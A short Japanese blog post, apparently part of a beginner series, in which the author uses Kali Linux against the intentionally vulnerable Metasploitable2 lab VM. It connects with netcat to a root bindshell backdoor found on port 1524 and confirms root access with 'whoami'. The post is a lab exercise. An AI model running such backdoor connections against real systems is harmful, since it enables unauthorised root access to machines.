セキュリティ

「Metasploitable2」で学ぶKali Linuxの基本#2[rootのバックドア]

「Metasploitable2」で学ぶKali Linuxの基本#1[Nmap,vsftpdの脆弱性]今回は、前回インストールしたKali Linuxを触っていきましょう。 https://raspiblog.com/securit...

↑前回

1524/tcp  open  bindshell   Metasploitable root shell

nmapで前回スキャンした際にこのようなものを発見しました。名前にある通り、誰かが作ったrootのバックドアのようです。とりあえず接続してみます。netcatを使います。

Contents
  1. NetCat

NetCat

netcatはネットワークを扱うツールとして知られています。接続していきます。

$ nc 192.168.56.*** 1524

IPアドレスとポートを設定して実行します。

root@metasploitable:/#
$ whoami
root

rootのバックドアであることがわかりました。次回は違うOSでハッキングを実践していきます。

気になるアイテム



COMMENT

メールアドレスが公開されることはありません。 が付いている欄は必須項目です